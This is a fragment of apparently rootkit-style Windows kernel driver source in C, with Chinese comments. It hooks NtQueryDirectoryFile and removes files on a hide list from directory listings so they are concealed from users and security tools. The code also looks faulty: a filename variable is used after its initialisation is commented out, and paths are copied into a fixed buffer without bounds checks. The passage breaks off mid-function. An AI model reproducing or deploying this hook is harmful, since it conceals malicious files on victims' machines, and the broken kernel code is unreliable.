NTSTATUS
HookNtQueryDirectoryFile(IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
OUT PVOID FileInformation,
IN ULONG FileInformationLength,
IN FILE_INFORMATION_CLASS FileInformationClass,
IN ULONG ReturnSingleEntry,
IN PUNICODE_STRING FileName OPTIONAL,
IN ULONG RestartScan)
{
NTSTATUS ret;
ULONG CR0VALUE;
ANSI_STRING ansiPathName,ansiFileName;
UNICODE_STRING uniPathName;
PCWSTR pProcPath = NULL;
ULONG name_length;
char buff[1024] = {0};
DWORD dwProId = -1;
BOOLEAN bToLong = FALSE;
ret = ((NtQUERYDIRECTORYFILE)(OldNtQueryDirectoryFile))(
FileHandle,
Event,
ApcRoutine,
ApcContext,
IoStatusBlock,
FileInformation,
FileInformationLength,
FileInformationClass,
ReturnSingleEntry,
FileName,
RestartScan
);
if (!NT_SUCCESS(ret))
return ret;
if( !g_bClientRuning )
return ret;
/*对返回结果进行处理*/
switch(FileInformationClass)
{
case FileBothDirectoryInformation:
case FileDirectoryInformation:
case FileFullDirectoryInformation:
case FileIdBothDirectoryInformation:
case FileIdFullDirectoryInformation:
case FileNamesInformation:
{
PFILE_LIST now,last = NULL;
ULONG name_length;
PWCHAR file_name;
now = (PFILE_LIST)FileInformation;
while( now != NULL )
{
GetDosNameChar(FileHandle);
RtlInitUnicodeString( &uniPathName,FileDirectory );
RtlUnicodeStringToAnsiString( &ansiPathName , &uniPathName , TRUE );
name_length = GetFileName(FileInformationClass,now);
//RtlInitUnicodeString( &uniFileName , L"2.txt" );
RtlUnicodeStringToAnsiString(&ansiFileName,&uniFileName,TRUE);
strcpy( buff , ansiPathName.Buffer );
strcat( buff , "\\" );
strcat( buff , ansiFileName.Buffer );
if ( InHideFileList( buff ) )
{
DbgPrint( "是要隐藏的文件" );
if( NULL != last )
{
if( now->NextEntryOffset != 0 )
{
DbgPrint( "NULL != last if( now->NextEntryOffset != 0 )" );
last->NextEntryOffset += now->NextEntryOffset;
}
else
{
DbgPrint( "NULL != last else if( now->NextEntryOffset != 0 )" );
last->NextEntryOffset = 0;
}
}
else
{
if( now->NextEntryOffset == 0 )
{
RtlZeroMemory(FileInformation,FileInformationLength);
DbgPrint( "ReturnSingleEntry:%d" , ReturnSingleEntry );
if( ReturnSingleEntry )
{
NTSTATUS status2;
DbgPrint( "NULL == last now->NextEntryOffset == 0 ReturnSingleEntry == TRUE" );
status2 = HookNtQueryDirectoryFile(
FileHandle,
Event,
ApcRoutine,
ApcContext,
IoStatusBlock,
FileInformation,
FileInformationLength,
FileInformationClass,
ReturnSingleEntry,
FileName,
FALSE
);
RtlFreeAnsiString(&ansiPathName);
RtlFreeAnsiString(&ansiFileName);
return status2;
}
DbgPrint( "NULL == last now->NextEntryOffset == 0 ReturnSingleEntry == FALSE" );
IoStatusBlock->Status = STATUS_NO_SUCH_FILE;
IoStatusBlock->Information = 0;
IoStatusBlock->Pointer = 0;
RtlFreeAnsiString(&ansiPathName);